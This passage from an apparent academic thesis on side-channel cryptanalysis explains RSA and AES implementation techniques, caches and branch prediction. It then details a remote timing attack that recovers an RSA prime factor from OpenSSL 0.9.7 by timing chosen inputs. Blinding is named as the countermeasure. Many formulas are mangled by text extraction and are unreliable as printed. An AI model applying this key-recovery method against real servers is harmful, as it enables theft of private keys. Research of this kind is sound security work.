or even virtualization, SBPA attacks empower an unprivileged process to successfully attack other processes running in parallel on the same processor. Thus,
we conclude that SBPA attacks are much more dangerous than previously anticipated, as they obviously do not belong to the same category as pure timing
attacks.
13
2. BACKGROUND
In this section, we give the necessary background information to understand the rest of this document. This section focuses on two encryption algorithms: RSA, which is the most widely used public-key cryptosystem, and AES,
which is the new American standard for secret-key encryption. We also give basic
information on some of the processor components, more specifically on the cache
and branch prediction unit, which are analyzed from a side-channel point of view
in this document.
In order to keep this document in a reasonable size, we omit many details on
the aformentioned subjects. We simply refer the reader to the following references
for further details:
• Cryptography: [64, 90, 97, 56, 96, 104, 98]
• RSA: [82, 17, 12, 49, 50, 84, 29, 57, 58]
• AES: [31, 8, 9]
• Computer Architecture: [41, 78, 33, 91, 92]
2.1. Basics of RSA and Its Implementations
In this section we give the necessary information about RSA and specific
implementation techniques in order to make the reader understand the attacks we
explain in the next sections. We start with an overview of the RSA cryptosystem.
Then we cover some of the exponentiation techniques and efficient modular multiplication algorithms. All of these algorithms are currently being used in various
14
implementations of RSA. The reader should note that this section is not comprehensive in terms of the algorithms used in RSA implementations. However we
cover everything necessary to grasp the basic ideas presented in this document.
2.1.1. Overview of RSA
RSA is a public key cryptosystem which is developed by Rivest, Shamir
and Adleman [82]. The main computation in RSA decryption is the modular
exponentiation
P = M d (mod N )
, where M is the message or the ciphertext, d is the private key that is a secret,
and N is the public modulus which is known to anyone. Indeed, N is a product
of two large primes p and q. The strength of RSA comes from the hardness of
factorization problem. It is assumed that even though N is a publicly known
number, the factors of N cannot be calculated.
If an adversary obtains the secret value d, he can read all of the encrypted
messages and impersonate the owner of the key. Therefore, the main purpose of
using side-channel attacks on RSA is to reveal this secret value. If the adversary
can factorize N , i.e. he can obtain either p or q, the value of d can easily be
calculated. Hence, the attacker tries to find either p, q, or d.
Since the size of the key, i.e. the size of d, in RSA is very large, e.g. around
1024 or 2048 bits, the exponentiation is very expensive in terms of execution time.
Therefore the actual implementations of RSA need to employ efficient algorithms
to calculate the result of this operation. In the next subsections, we will explain
the most widely used algorithms, which can also be exploited in side-channel
attacks.
15
2.1.2. Exponentiation Algorithms
In this subsection, four different methods to compute an exponentiation
are presented. For a more comprehensive treatment of exponentiation techniques,
we refer the reader to [57, 64]. Let say we want to compute M d (mod N ) , where
d is an n-bit number, i.e. d = (d0 , d1 , ..., dn−1 )2 .
2.1.2.1. Binary Square-and-Multiply Exponentiation Algorithm
The binary version of Square-and-Multiply Algorithm (SM) is the simplest
way to perform an exponentiation. Figure 2.1 shows the steps of SM, which
processes the bits of d from left to right. There are also some versions of SM
algorithm that process d in reverse order. The reader should note that all of the
multiplications and squarings are shown as modular operations, although the basic
SM algorithm computes regular exponentiations. This is because RSA performs
modular exponentiation, and our focus is on this cryptosystem. In an efficient RSA
implementation, all of the multiplications and squarings are performed by using a
special modular multiplication algorithm called Montgomery Multiplication (c.f.
Section 2.1.3).
2.1.2.2. b-ary Square-and-Multiply Exponentiation Algorithm
A more advanced version of SM, which is called b-ary method, decreases
the total number of multiplications during the exponentiation. In this method, the
n-bit exponent d is considered to be in radix-2b form, i.e. d = (d0 , d1 , ..., dk−1 )2b ,
where n = k ∗ b. It requires a preprocessing phase to compute multiples of M
16
S=M
for
i from 1 to n − 1 do
S = S ∗ S (mod N )
if
di = 1 then
S = S ∗ M (mod N )
return S
FIGURE 2.1. Binary version of Square-and-Multiply Exponentiation Algorithm
so that many multiplications can be combined during the exponentiation phase.
The steps of this algorithm are shown in Figure 2.2.
2.1.2.3. Sliding Window Exponentiation
This algorithm is very similar to b-ary method, except a slight modification.
In b-ary method the exponent d is split into consecutive ‘windows’ of b consecutive
bits. The number of multiplications can be further decreased by splitting d into
odd windows of at most b consecutive bits, where the windows are not necessarily
consecutive and may be separated by zero bits (c.f. Figure 2.3).
2.1.2.4. Balanced Montgomery Powering Ladder
In the context of side channel attacks, c.f. [28, 59, 52], it was quickly
“agreed” that simple side-channel attacks could be (simply) mitigated by avoiding
17
e1 = M
for
i from 2 to 2b − 1
ei = ei−1 ∗ M (mod N )
S = ed0
for
i from 1 to k − 1 do
b
S = S 2 (mod N )
if
di 6= 0 then
S = S ∗ edi (mod N )
return S
FIGURE 2.2. b-ary version of Square-and-Multiply Exponentiation Algorithm
18
e1 = M, e2 = M 2 (mod N )
for
i from 1 to 2b−1 − 1
e2i+1 = e2i−1 ∗ e2 (mod N )
S = 1, i = 0
while
i < k do
if
di = 0 then
S = S ∗ S (mod N )
i=i+1
else find the maximum t such that
t − i + 1 ≤ b, t < k, and dt = 1
l = (di , ..., dt )2
S = S2
t−i+1
∗ el (mod N )
i=t+1
return S
FIGURE 2.3. Sliding Window Exponentiation Algorithm
19
R0 = 1; R1 = M
for i from 0 to n − 1 do
if di = 0 then
R1 = R0 ∗ R1 (mod N )
R0 = R0 ∗ R0 (mod N )
else [if di = 1] then
R0 = R0 ∗ R1 (mod N )
R1 = R1 ∗ R1 (mod N )
return R0
FIGURE 2.4. Balanced Montgomery Powering Ladder
the unbalanced and key-dependent conditional branch in the above Figures 2.1
and 2.3, and just insert dummy operations into the flow in order to make the
operations after the conditional branch more balanced, c.f. [52]. As this “dummy
equipped” binary SM algorithm still had some negative side-effects, a very active
research area arose around the so called Balanced Montgomery Powering Ladder,
as shown in the Figure 2.4.
This exponentiation is assumed to be “intrinsically secure” against simple
side-channel attacks, c.f. [52], and also has many computational advantages over
the above basic SM algorithm. Unfortunately, as we explain later in Chapter 7,
that all those “balanced branch” exponentiation algorithms are “intrinsically insecure” in the presence of Branch Prediction attacks.
20
2.1.3. Montgomery Multiplication
Montgomery Multiplication (MM) is the most efficient algorithm to compute a modular multiplication. It uses additions and divisions by powers of 2,
which can be accomplished by shifting the operand to the right, to calculate the
result; therefore it is very suitable for hardware architectures. Since it eliminates
time consuming integer division operations, the efficiency of the algorithm is very
high.
Montgomery Multiplication is used to calculate
Z = A ∗ B ∗ R−1 (mod N )
, where A and B are the N -residues of a and b with respect to R, R is a constant
power of 2, and R−1 is the inverse of R in modulus N .
A = a ∗ R (mod N ),
B = b ∗ R (mod N ),
R−1 ∗ R = 1 (mod N ),
and R > N . Another constraint is that R has to be relatively prime to N . But
since N is a product of two large primes in RSA, choosing an R of a power of 2
is sufficient to guarantee that these two numbers are relatively prime. Let N be
a k-bit odd number, then 2k is the most suitable value for R.
A conversion to and from N -residue format is required to use this algorithm. Hence, it is more attractive to be used for repeated multiplications on the
same residue, just like modular exponentiations. Figure 2.5 shows the algorithm
to compute Montgomery multiplication. The conditional subtraction (S − N ) in
the third line is called ‘extra reduction’. This conditional subtraction step is the
21
S =A∗B
S = (S − (S ∗ N −1 mod R) ∗ N )/R
if S > N then S = S − N
return S
FIGURE 2.5. Montgomery Multiplication Algorithm
main source of data dependent execution time variations exploited in classical
timing attacks on RSA (c.f. Chapter 3 and [6, 21, 34, 85, 88]).
2.1.4. Chinese Remainder Theorem
Chinese Remainder Theorem (CRT) is one of the oldest and most famous
theorems in Number Theory. We will not explain the details of CRT in this
paper, but only the use of it to fasten RSA operations. Instead of computing
P = M d (mod N ) directly, a more complex method can be used to perform the
same operation roughly 4 times faster. The algorithm is described in Figure 2.6.
Using Chinese Remainder Theorem, we replace modular exponentiation with fulllength modulus N by two modular exponentiations with half-length modulus p
and q. Note that this method can only be used by the owner of the secret key
since it requires the knowledge of the factors of N.
22
Step 1: a) up := M (mod p)
b) dp := d (mod p − 1)
d
c) P1 := upp (mod p)
Step 2: a) uq := M (mod q)
b) dq := d (mod q − 1)
d
c) P2 := uq q (mod q)
Step 3: Return ((p−1 (mod q)) ∗ (P2 − P1 ) (mod q)) ∗ p + P1
FIGURE 2.6. RSA with CRT
2.2. Basics of AES and Its Implementations
2.2.1. Overview of AES
Rijndael ( [31]) is a symmetric block cipher, which was announced as Advanced Encryption Standard (AES) by NIST [8]. AES allows key sizes of 128,
192, and 256 bits; and operates on 128-bit blocks. For simplicity, we will describe
only the 128-bit version of the algorithm in this document.
AES performs operations on a 4x4 byte-matrix, called State, which is the
basic data structure of the algorithm. The algorithm composed of a certain number of rounds depending on the length of the key. When the key is 128 bits long,
the encryption algorithm has 10 rounds of computations, all except the last one of
which performs the same operations. Each round has different component func-
23
tions and a round key, which is derived from the original cipherkey. The four
component functions are
1. SubBytes Transformation,
2. ShiftRows Transformation,
3. MixColumns Transformation,
4. and AddRoundKey Operation.
The AES encryption algorithm has an initial application of the AddRoundKey operation followed by 9 rounds and a final round. The first 9 rounds use all
of these component functions in the given order. The MixColumns Transformation is excluded in the last round. A separate key scheduling function is used to
generate all of the round keys, which are also represented as 4x4 byte-matrices,
from the initial key. The details of the algorithm can be found in [31] and [8].
2.2.2. AES Software Implementations
The primary concern of the software implementations of AES is the efficiency in terms of speed. Many efficient implementations have been proposed
since the selection of Rijndael as AES. In this paper, we will focus on the one
described in [31], which is the most efficient and the most widely used one.
In this implementation, all of the component functions, except AddRoundKey, are combined into four different tables and the rounds turn to be composed
of table lookups and bit-wise xor operations (Figure 2.7). Before the first round,
there is an extra round key addition, which adds the cipherkey to the state that
24
.
FIGURE 2.7. Round operations in AES
has the actual plaintext. In other words, the input to the first table lookup is the
bitwise addition of the plaintext and the cipherkey.
The most widely used software implementation of AES is described in [31]
and it is designed especially for 32-bit architectures. To speed up encrytion, all
of the component functions of AES, except AddRoundKey, are combined into
lookup tables and the rounds turn to be composed of table lookups and bitwise
exclusive-or operations. The five lookup tables T0, T1, T2, T3, T4 employed
in this implementation are generated from the actual AES S-box values as the
following way:
T 0[x] = (2 • s(x), s(x), s(x), 3 • s(x)),
T 1[x] = (3 • s(x), 2 • s(x), s(x), s(x)),
T 2[x] = (s(x), 3 • s(x), 2 • s(x), s(x)),
T 3[x] = (s(x), s(x), 3 • s(x), 2 • s(x)),
25
T 4[x] = (s(x), s(x), s(x), s(x)) ,
where s(x) and • stand for the result of an AES S-box lookup for the input value x
and the finite field multiplication in GF(28 ) as it is realized in AES, respectively.
The round computations, except in the last round, are in the form:
(r+1)
(r+1)
(r+1)
(r+1)
r
r
r
r
)⊕
, RK(4∗i+3)
, RK(4∗i+2)
, RK(4∗i+1)
(S(4∗i) , S(4∗i+1) , S(4∗i+2) , S(4∗i+3) ) = (RK(4∗i)
r
r
T 0[S(4∗i)
] ⊕ T 1[S(4∗i+5
mod 16) ]
r
⊕ T 2[S(4∗i+10
mod 16) ]
r
⊕ T 3[S(4∗i+15
mod 16) ]
,
where Sir is the byte i of intermediate state value that becomes the input of round
r, RKir is the ith byte of the rth round key and i ∈ {0, .., 3}.
2.3. Basics of Computer Microarchitecture: Cache and Branch Prediction
In this section, we outline the basics of some processor components, which
have been identified as sources of side-channel leakage. Although it is beneficial —
in order to completely understand the attacks as described later — to know many
details about modern computer architecture and especially cache and branch prediction schemes, it is unrealistic to explain all these subtle details here. Thus,
we refer the reader to [78, 91, 92] for a thorough treatment of these topics. Nevertheless, we now explain the basic concepts common to most cache and branch
prediction units, although the exact details differ from processor to processor and
are not completely documented in freely available processor manuals.
2.3.1. Processor Cache
A high-frequency processor needs to retrieve the data at a very high speed
in order to utilize its functional resources. The latency of a main memory is not
26
short enough to match this demand of high speed data delivery. The gap between
the latency of main memories and the actual demand of processors has been and
will be continuously increasing as Moore’s Law holds. Common to all processors,
the attempt to close this gap is the employment of a special buffer called cache.
A cache is a small and fast memory area used by the processor to reduce
the average time to access main memory. It stores copies of the most frequently
used data.1 Employment of cache in a processor reduces the average memory
access time because data, including instructions, has several locality properties
that can be taken advantage of. Temporal locality is one of these properties and
it exploits the assumption that recently used data will probably be needed in the
near future. The other property is the spatial locality, which assumes that the
nearby data of a currently used one will also be needed in the near future.
When the processor needs to read a location in main memory, it first checks
to see if the data is already in the cache. If the data is already in the cache (a
cache hit), the processor immediately uses this data instead of accessing the main
memory, which has a longer latency than a cache. Otherwise (a cache miss), the
data is read from the memory and a copy of it is stored in the cache. This copy
is expected to be used in the near future due to the temporal locality property.
The minimum amount of data that can be read from the main memory into the
cache at once is called a cache line or a cache block, i.e., each cache miss causes a
cache block to be retrieved from a higher level memory. The reason why a block
of data is transferred from the main memory to the cache instead of transfering
only the data that is currently needed lies in spatial locality property.
1 Although
it depends on the particular data replacement policy, this assumption is
true almost all the time for current processors.
27
Design and implementation of a cache take several parameters into consideration to meet the desired cost/performance metrics. These parameters include:
• number of levels of cache
• size of these caches
• latency of these caches
• penalty of a cache miss in these levels
• size of a cache block in these levels
• overhead of updating main memory and higher level caches
Further details on these parameters and specific values used in particular processors are not given in this document, but can be found in [43, 78, 39]. Before
moving on to the next section, where we describe the basics of branch prediction,
we want to mention two very important concepts that affect the performance of
a cache: the mapping strategy and the replacement policy.
Cache mapping strategy is the method of deciding where to store, and
thus to search for, a data in a cache. Three main cache mapping strategies are
direct, fully associative and set associative mapping. In a direct mapped cache, a
particular data block can only be stored in a single certain location in the cache.
On the contrary, a data block can be placed in any location in a fully associative
cache. The location of a particular placement is determined by the replacement
policy. Set associative mapping is a blend of these two mapping strategies. Set
associative caches are divided into a number of same size sets and each set contains
the same fixed number of cache blocks. A data block can be stored only in a certain
cache set (just like in a direct mapped cache), however it can be placed in any
28
location inside this set (like in a fully associative cache). Again, the particular
location of a data inside its cache set is determined by the replacement policy.
The replacement policy is the method of deciding which data block to evict
from the cache in order to place the new one in. The ultimate goal is to choose the
data that is most unlikely to be used in the near future. There are several cache
replacement policies proposed in the literature (c.f. [43, 78]). In this document, we
focus on a specific one: least-recently-used (LRU). It is the most commonly used
policy and it picks the data that is least recently used among all of the candidate
data blocks that can be evicted from the cache.
2.3.2. Branch Prediction Units
Deep CPU pipelines paired with the CPU’s ability to fetch and issue multiple instructions at every machine cycle led to the concept of superscalar processors.
Superscalar processors admit a theoretical or best-case performance of less than
1 machine cycle per completed instructions, c.f. [92]. However, the inevitably required branch instructions in the underlying machine languages were very soon
recognized as one of the most painful performance killers of superscalar processors. Not surprisingly, CPU architects quickly invented the concept of branch
predictors in order to circumvent those performance bottlenecks. Thus, it is not
surprising that there has been a vibrant and very practical research on more and
more sophisticated branch prediction mechanisms, c.f. [78, 91, 92]. Unfortunately
we identify branch prediction as a novel and unforeseen side-channel, thus being
another new security threat within the computer security field.
Superscalar processors have to execute instructions speculatively to overcome control hazards, c.f. [92, 78]. The negative effect of control hazards on the
29
effective machine performance increases as the depth of pipelines increases. This
fact makes the efficiency of speculation one of the key issues in modern superscalar processor design. The solution to improve the efficiency is to speculate
on the most likely execution path. The success of this approach depends on the
accuracy of branch prediction. Better branch prediction techniques improve the
overall performance a processor can achieve, c.f. [92, 78].
A branch instruction is a point in the instruction stream of a program
where the next instruction is not necessarily the next sequential one. There are
two types of branch instructions: unconditional branches (e.g. jump instructions,
goto statements, etc.) and conditional branches (e.g. if-then-else clauses, for and
while loops, etc.). For conditional branches, the decision to take or not to take
the branch depends on some condition that must be evaluated in order to make
the correct decision. During this evaluation period, the processor speculatively
executes instructions from one of the possible execution paths instead of stalling
and awaiting for the decision to come through. Thus, it is very beneficial if the
branch prediction algorithm tries to predict the most likely execution path in a
branch. If the prediction is true, the execution continues without any delays. If
it is wrong, which is called a misprediction, the instructions on the pipeline that
were speculatively issued have to be dumped and the execution starts over from
the mispredicted path. Therefore, the execution time suffers from a misprediction.
The misprediction penalty obviously increases in terms of clock cycles as the depth
of pipeline extends. To execute the instructions speculatively after a branch, the
CPU needs the following information:
• The outcome of the branch. The CPU has to know the outcome of a branch,
i.e., taken or not taken, in order to execute the correct instruction sequence.
However, this information is not available immediately when a branch is
30
issued. The CPU needs to execute the branch to obtain the necessary information, which is computed in later stages of the pipeline. Instead of
awaiting the actual outcome of the branch, the CPU tries to predict the
instruction sequence to be executed next. This prediction is based on the
history of the same branch as well as the history of other branches executed
just before the current branch, cf. [92].
• The target address of the branch. The CPU tries to determine if a branch
needs to be taken or not taken. If the prediction turns out to be taken, the
instructions in the target address have to be fetched and issued. This action
of fetching the instructions from the target address requires the knowledge
of this address. Similar to the outcome of the branch, the target address
may not be immediately available too. Therefore, the CPU tries to keep
records of the target addresses of previously executed branches in a buffer,
the so called Branch Target Buffer (BTB).
Overall common to all Branch Prediction Units (BPU) is the following Figure 2.8.
As shown, the BPU consists of mainly two “logical” parts, the BTB and
the predictor. As said already above, the BTB is the buffer where the CPU stores
the target addresses of the previously executed branches. Since this buffer is
limited in size, the CPU can store only a number of such target addresses, and
previously stored addresses may be evicted from the buffer if a new address needs
to be stored instead.
The predictor is that part of the BPU that makes the prediction on the
outcome of the branch under question. There are different parts of a predictor,
i.e., Branch History Registers (BHR) like the global history register or local his-
31
.
FIGURE 2.8. Branch Prediction Unit Architecture
tory registers, and branch prediction tables, cf. [92]. Further details of branch
prediction can be found in [78, 91, 92].
32
3. REMOTE TIMING ATTACK ON RSA
Several timing attacks have been developed against specific RSA implementations since the introduction of side channel cryptanalysis in [59]. For example, [59] and [34] describe timing attacks on RSA implementations which do not
utilize Chinese Remainder Theorem (CRT). These attacks were generalized and
optimized by advanced stochastic methods (c.f. [86, 88, 87]). Since these attacks
cannot be applied to RSA implementations that use CRT, it had been thought
for years that RSA-CRT was immune to timing attacks.
However, in [85], a new and efficient attack on RSA implementations that
use CRT with Montgomery’s multiplication algorithm was introduced. Under
optimal conditions, it takes about 300 timing measurements to factorize 1024-bit
RSA moduli. We note that these attacks can be prevented by blinding techniques
(c.f. [59], Sect. 10).
Typical targets of timing attacks are the security features in smart cards.
Despite of Bleichenbacher’s attack ( [16]), which (e.g.) exploited weak implementations of the SSL handshake protocol, the vulnerability of RSA implementations
running on servers was not known until Brumley and Boneh performed a timing
attack over a local network in 2003 ( [21]). They mimicked the attack introduced
in [85] to show that RSA implementation of OpenSSL [71], which is the most
widely used open source crypto library, was not immune to such attacks. Although blinding techniques for smart cards had already been ‘folklore’ for years,
various crypto libraries that were used by SSL implementations did not apply
these countermeasures at that time (c.f. [21]).
In this section, we present a timing attack, which is an improvement of
[21] by a factor of more than 10 [6]. All of these timing attacks ( [59, 34, 88,
33
85, 21]) including the one presented in this chapter can be prevented by base
blinding or exponent blinding. However, it is always desirable to understand
the full risk potential of an attack in order to confirm the trustworthiness of
existing or, if necessary, to develop more secure and efficient countermeasures and
implementations.
Our attack exploits the peculiarity of the sliding windows exponentiation
algorithm and, independently, suggests a general improvement of the decision
strategy. Although it is difficult to compare the efficiency of attacks performed in
different environments (c.f. [21]), it is obvious that our new attack improves the
efficiency of Brumley and Boneh’s attack by a factor of at least 10.
3.1. General Idea of a Timing Attack on RSA-CRT
Most of the RSA implementations use Chinese Remainder Theorem (CRT)
to compute the modular exponentiation. CRT reduces the computation time by
about 75%, compared to a straight-forward exponentiation (c.f. Section 2.1.4).
Montgomery Multiplication (MM) is the most efficient algorithm to compute modular multiplications during a modular exponentiation. Since it eliminates time
consuming integer divisions, the efficiency of the algorithm is very high. See Sections 2.1.4 and 2.1.3 for details of these algorithms.
Since the operand size of the arithmetic operations can simply be assumed
to be constant during RSA exponentiation, the time required to perform integer
operations in MM can also be assumed to depend only on the constants N and R
but not on the operands A and B. This assumption is very reasonable for smart
cards whereas software implementations may process small operands (i.e., those
with leading zero-words) faster due to optimizations of the integer multiplication
34
1.) ȳ1 := M M (M, R2 ; n)
(= M*R (mod n))
2.) Modular Exponentiation Algorithm
a) table initialization (if necessary)
b) exponentiation phase
3.) Return MM(temp,1;n)
( =M d (mod n) )
FIGURE 3.1. Modular Exponentiation with Montgomery’s Algorithm
algorithm. In fact, this is the case for many SSL implementations which complicates the attack described in [21] and ours. (Both attacks are chosen-input attacks
where small operands occur.) Under the simplifying assumption from above, we
can conclude that Time(M M (A, B; N )) ∈ {c, c+cER }, where Time(M M (A, B; N ))
is the execution time of M M (A, B; N ) and M M (A, B; N ) is the Montgomery
multiplication with the input values A, B, and N . The Montgomery operation
requires a processing time of c + cER iff the extra reduction has to be carried out.
In the rest of this chapter, we denote the public RSA modulus as n instead
of the capital letter N , because we need to use N to denote another variable.
Figure 3.1 explains how Montgomery’s multiplication algorithm can be
combined with arbitrary modular exponentiation algorithms to compute M d ( mod
n). The variable temp in Phase 3 represents the result of the exponentiation phase.
Of course, in Phase 2a and 2b modular squarings and multiplications have to be
replaced by the respective Montgomery operations.
35
The different attacks [85] and [21] exploit the timing behavior of the Montgomery multiplications in Phase 2b of the modular exponentiation (c.f. Figure
3.1). We can interpret the execution time of the ith Montgomery operation in
Phase 2b (squaring or a multiplication by a table value) as a realization of the
random variable c + Wi · cER where W1 , W2 , . . . denotes a sequence of {0, 1}-valued
random variables. The stochastic process W1 , W2 , . . . has been studied in detail
in [86, 85, 87]. We merely mention that


 1 n for MM(temp, temp; n)
3R
E(Wi ) =
ȳ

 1 j n for MM(temp, ȳj ; n).
2 n R
(3.1)
where ȳj and temp denote a particular table entry and an intermediate result during the exponentiation, respectively. ‘E(·)’ denotes the expectation of a random
variable. The timing behavior of the Montgomery operations in Phase 2a) can
similarly be described by a process W10 , W20 , . . ..
When applying the CRT, (3.1) indicates that the probability of an extra
reduction during a Montgomery multiplication of the intermediate result temp
with ȳ1;p = M ∗ R (mod p) in Step 1 (resp. with ȳ1;q = M ∗ R (mod q) in Step 2)
is linear in ȳ1;p /p (resp. linear in ȳ1;q /q). Note that the message (u ∗ R−1 )(mod
n) corresponds to the value u during the exponentiation, because the messages
are multiplied by R to convert them into Montgomery form. If the base of the
exponentiation is y := uR−1 (mod n), then ȳ1;p = yR ≡ u (mod p) and ȳ1;q =
yR ≡ u (mod q). The same equation also implies that the same probability does
not depend on y during the squarings.
For 0 < u1 < u2 < n with u2 − u1 p, q, three cases are possible: The
‘interval set’ {u1 + 1, . . . , u2 } contains no multiple of p or q (Case A), contains
a multiple of p or q but not both (Case B), or contains multiples of both p and
36
q (Case C). The running time for input y := uR−1 (mod n), denoted by T (u), is
interpreted as a realization of a normally distributed random variable Xu .
If the square and multiply exponentiation algorithm is applied, the computation of P1 durign the CRT operations (c.f. Figure 2.6) requires about log2 (n)/4
multiplications with ȳ1;p , and hence (3.1) implies



0



√
n
E(Xu2 − Xu1 ) ≈ − cER
log2 (n)
8 R


√


 − cER n log (n)
2
4 R
for Case A
for Case B
for Case C
This property allows us to devise a timing attack that factorizes the modulus n by exposing one of the prime factors, e.g. q, bit by bit. We use the fact
that if the interval (u1 , u2 ], i.e., the integers in {u1 + 1, u1 + 2, ..., u2 }, contains
a multiple of q, i.e., in case of Case B or C, then T(u1 ) - T(u2 ) will be smaller
√
than cER log2 (n) n/16R. Let say the attacker already knows that q is in (u1 , u2 ]
(after checking several intervals; = Phase 1 of the attack) and trying to reduce
the search space. In Phase 2 the decision strategy becomes:
1. Split the interval into two equal parts: (u1 , u3 ] and (u3 , u2 ], where u3 =
b(u1 + u2 )/2c. As usual, bzc denotes the largest integer that is ≤ z.
√
2. If T (u3 ) − T (u2 ) < cER log2 (n) n/16R decide that q is in (u3 , u2 ], otherwise
in (u1 , u3 ].
3. Repeat the first steps until the final interval becomes small enough to factorize n using the Euclidean algorithm
At any time within Phase 2 the attacker can check whether her previous
decisions have been correct. To confirm that an interval really contains q the
37
attacker applies the decision rule to similar but different intervals, e.g., (u1 + 1,
u2 − 1], and confirms the interval if they yield the same decision.
In fact, it is sufficient to recover only the upper half of the bit representation
of either p or q to factorize n by applying a lattice-based algorithm [27].
Under ideal conditions (no measurement errors) this attack requires about
300 time measurements to factorize a 1024-bit RSA modulus n ≈ 0.7 · 21024 , if
square and multiply algorithm is used. In Phase 2 of the attack, each decision
essentially recovers one further bit of the binary representation of one prime factor.
The details and analysis of this attack can be found in [85].
3.2. Overview of Brumley and Boneh Attack
We explain the attack of [21], which will be refered as BB-attack from here
on, and ours in the following two sections along with a discussion of the advantages
of our attack over the other.
RSA implementation of OpenSSL version 0.9.7 used to employ Montgomery Multiplication, CRT, and Sliding Window Exponentiation (SWE) with
a window size, denoted by wsize, of 5.
1
SWE algorithm processes the expo-
nent d by splitting it into odd windows of at most wsize consecutive bits (i.e.
1 At
the time our paper ( [6]) was written, the latest version of OpenSSL Library was
0.9.7. They changed this particular RSA implementation configuration and started to
employ b-ary exponentiation algorithm with additional mitigation techniques to protect RSA against cache-based side-channel attacks starting with version 0.9.8 after the
certain advances on microarchitectural side-channel area discussed in the later chapters
of this document.
38
in substrings of length ≤ wsize having odd binary representation), where the
windows are not necessarily consecutive and may be separated by zero bits (c.f.
Section 2.1.2.3). It requires a preprocessing phase, i.e., table initialization, to
compute odd powers of the base y so that many multiplications can be combined
during the exponentiation phase.
The modulus n is 1024-bit number, which is the product of two 512bit primes p and q. Considering one of these primes, say q, the computation
d
of yq q (modq) requires 511 Montgomery operations of type MM(temp, temp; q)
(‘squarings’) and approximately (511 · 31)/(5 · 32) ≈ 99 multiplications with the
table entries during the exponentiation phase of SWE (cf. Table 14.16 in [64]).
Consequently, in average ≈ 6.2 multiplications are carried out with the table entry
ȳ1;q .
BB-Attack exploits the multiplications MM(temp, ȳ1;q ; q) that are carried
out in the exponentiation phase of SWE. Assume that the attacker tries to recover
q = (q0 , ..., q511 ) and already obtained first, i.e. most significant, k bits. To guess
qk , the attacker generates g and ghi , where g =
(q0 , ..., qk−1 , 0, 0, ..., 0) and ghi = (q0 , ..., qk−1 , 1, 0, 0, ..., 0). Note that there are two
possibilities for q: g < q < ghi (when qk = 0) or g < ghi < q (when qk = 1). She
determines the decryption time t1 = T (g) = T ime(udg mod n) and t2 = T (ghi ) =
T ime(udghi mod n), where ug = g ∗ R−1 (mod n) and ughi = ghi ∗ R−1 (mod n). If
qk is 0, then |t1 − t2 | must be “large”. Otherwise |t1 − t2 | must be close to zero,
which implies that qk is 1. The message ug (ughi resp.) corresponds to the value
g (ghi resp.) during the exponentiations, because of the conversion into Montgomery form. BB-attack does not only compare the timings for gR−1 ( mod n) and
ghi R−1 (mod n) but uses the whole neighborhoods of g and ghi , i.e., N (g; N ) =
{g, g + 1, . . . , g + N − 1} and N (ghi ; N ) = {ghi , ghi + 1, . . . , ghi + N − 1}, respec-
39
tively. The parameter N is called the neighborhood size. For details, the reader
is referred to [21].
3.3. Details of Our Approach
Only about 6 from ca. 1254 many Montgomery operations performed in
RSA exponentiation provide useful information for BB-attack. On the other hand,
the table initialization phase of the exponentiation in modulo q requires 15 Montgomery multiplications with ȳ2 . Therefore, we exploit these operations in our
√
attack. In fact, let R05 = 2256 = R, the square root of R over the integers.
Clearly, for input y = u(R05)−1 (mod n) (inverse in the ring Zn ) we have
ȳ2;q = MM(ȳ1 , ȳ1 ; q) = u(R05)−1 u(R05)−1 R
≡ u2 (mod q).
(3.2)
Instead of N (g, N ) and N (ghi , N ) we consequently consider the neighborhoods
N (h; N ) = {h, h+1, . . . , h+N −1} and N (hhi ; N ) = {hhi , hhi +1, . . . , hhi +N −1},
resp., where
√
√
h = b gc and hhi = b ghi c.
(3.3)
To be precise, we consider input values y = u(R05)−1 (mod n) with u ∈
N (h; N ) or u ∈ N (hhi ; N ). Even if we just directly copy the other steps of BBattack, this will increase the efficiency by a factor of ≈ (15.0/6.2)2 ≈ 5.8.
Under the assumption from Section 3.1, specifically
Time(MM(a, b; q)) ∈ {c, c + cER }
√
for any a, b ∈ Zq , we can simply replace the threshold value log2 (n) cER n/16R
√
by 60 cER n/16R. Clearly, the absolute value of this new threshold is much
40
smaller, which makes the attack less efficient in terms of the number of necessary
measurements.
The situation in an actual attack is more complicated as pointed out in
[21]. First of all, there are two different integer multiplication algorithms used
to compute MM(a, b; q): Karatsuba’s algorithm (if a and b consist of the same
number of words (nwords)) and the ‘normal’ multiplication algorithm (if a and b
consist of different numbers of words (nwords, mwords)). Karatsuba’s algorithm
has a complexity of O(nwords1.58 ), whereas the normal multiplication algorithm
requires O(nwords · mwords) operations. Normally, the length of each input
of Montgomery multiplication is 512 bits, therefore Karatsuba’s algorithm is supposed to be applied during RSA exponentiation. However, BB-attack and ours are
chosen-input attacks and some operands may be very small, e.g., ȳ1;q in BB-attack
and ȳ2;q in our attack. Beginning with an index (denoting the actual exponent bit
under attack) near the word size 32, the value of ȳ1;q , resp. ȳ2;q , has leading zero
words so that the program applies normal multiplication.
Unfortunately, the effects of having almost no extra reduction for small
table values but using less efficient integer multiplications counteract each other.
Moreover, the execution time of integer multiplications becomes less and less
during the course of the attack (normal multiplication algorithm!). It is worked
out in [21] that the time differences of integer multiplications depend on the
concrete environment, i.e., compiler options etc. Neither in [21] nor in this chapter,
we assume that the attacker knows all of these details. Instead, robust attack
strategies that work for various settings are used in both cases.
BB-attack evaluates the absolute values
41
N −1
X
Time (g + j)R−1 (mod n) −
=
j=0
N
−1
X
Time (ghi + j)R−1 (mod n) .
∆BB
(3.4)
j=0
∆BB becomes ‘small’ when dk = 1, whereas a ‘large’ value indicates that dk = 0
[21]. Our pendant is
∆=
N
−1
X
Time (h + j)(R05)−1 (mod n) −
j=0
N
−1
X
Time (hhi + j)(R05)−1 (mod n) ,
(3.5)
j=0
where we omit the absolute value.
√
Since (u + x)2 − u2 ≈ 2x q for u ∈ N (h, N ) or u ∈ N (hhi , N ), the value
∆ can only be used to retrieve the bits i ≤ 256 − 1 − log2 (N ). In fact, it is
recommended to stop even at least two or three bits earlier. The remaining bits
upto 256th bit of q can be determined by either using the former equation or
searching exhaustively.
Network traffic and other delays affect timing measurements, because we
can only measure response times rather than mere encryption times. For that
reason, identical input values are queried S many times, where S is one of the
parameters in BB-attack, to decrease the effect of outliers in [21]. We drop this
parameter in our attack, because increasing the number of different queries serves
the same purpose as well.
If ∆BB or |∆| are ‘large’ (in relation to their neighborhood size N ), that
is, if ∆BB > N · thBB;i , resp. |∆| > N · thi for suitable threshold values thBB;i
and thi (both depending on the index i) the attacker guesses qi = 0, otherwise
she decides for qi = 1.
42
On the other hand, sequential sampling exploits the fact that already a
